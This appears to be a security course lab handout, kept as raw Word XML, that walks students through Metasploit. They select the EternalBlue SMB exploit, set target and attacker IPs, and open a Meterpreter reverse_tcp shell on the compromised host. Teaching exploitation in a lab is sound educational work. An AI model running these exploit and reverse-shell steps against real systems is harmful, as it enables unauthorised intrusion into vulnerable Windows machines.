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289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E235F">
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 4 – Using the Metasploit </w:t>
      </w:r>
      <w:r w:rsidRPr="001E235F">
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="001E235F">
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>ramework</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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Objective</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Learn exploitation using the Metasploit Framework in a controlled lab environment.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Step 1 – Start Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Open a terminal in Kali Linux and run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t xml:space="preserve">After running the command you should see the </w:t>
      </w:r>
      <w:r w:rsidRPr="001E235F">
        <w:t>Metasploit console prompt:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>msf6 &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>This indicates that Metasploit has started successfully.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Step 2 – Search for SMB Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Inside the Metasploit console run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>search smb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>This command lists available SMB related exploit modules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Example results may includ</w:t>
      </w:r>
      <w:r w:rsidRPr="001E235F">
        <w:t>e:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>exploit/windows/smb/psexec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>exploit/linux/samba/trans2open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Step 3 – Select an Exploit Module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Select an exploit module using the use command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t xml:space="preserve">After selecting </w:t>
      </w:r>
      <w:r w:rsidRPr="001E235F">
        <w:t>the module the prompt will change to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>msf6 exploit(windows/smb/ms17_010_eternalblue) &gt;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Step 4 – View Required Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Check what configuration options are required for the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Important parameters usually include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t xml:space="preserve">RHOSTS – </w:t>
      </w:r>
      <w:r w:rsidRPr="001E235F">
        <w:t>Target machine IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>RPORT – Port number (default for SMB is 445)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Step 5 – Set the Target IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Specify the target machine's IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>set RHOSTS 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Verify the configuration by running:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>show options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Step 6 – Choose a Payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Displa</w:t>
      </w:r>
      <w:r w:rsidRPr="001E235F">
        <w:t>y available payloads:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:lastRenderedPageBreak/>
        <w:t>show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Example payload commonly used in labs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Set the payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>set PAYLOAD windows/x64/meterpreter/reverse_tcp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Step 7 – Configure Attacker IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Set your Kali Linux machine IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Exampl</w:t>
      </w:r>
      <w:r w:rsidRPr="001E235F">
        <w:t>e:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>set LHOST 192.168.1.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Confirm settings:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>show options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Step 8 – Run the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Execute the exploit using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>If successful, a Meterpreter session will open.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lastRenderedPageBreak/>
        <w:t>Step 9 – Interact With the Target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>List active sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Interact with a</w:t>
      </w:r>
      <w:r w:rsidRPr="001E235F">
        <w:t xml:space="preserve"> session:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>sessions -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>This will open a Meterpreter shell.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Step 10 – Example Meterpreter Commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Inside the Meterpreter shell you can try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>getuid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>pwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>These commands allow you to view system information and navigate the compromised machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E235F">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Expected Outcome</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Students successfully execute the exploit in a controlled lab environment and obtain a Meterpreter session on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="00837289"/>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Example output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>Meterpreter session 1 opened</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00837289" w:rsidRPr="001E235F" w:rsidRDefault="004F7FFD">
      <w:r w:rsidRPr="001E235F">
        <w:t>meterpreter &gt; sysinfo</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00837289" w:rsidRPr="001E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235F"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="004F7FFD"/>
    <w:rsid w:val="008372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A0051D-663F-41CA-9487-8D57FC94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82A934-82B3-4A68-8B68-86E5200CF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2026-03-17T05:09:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>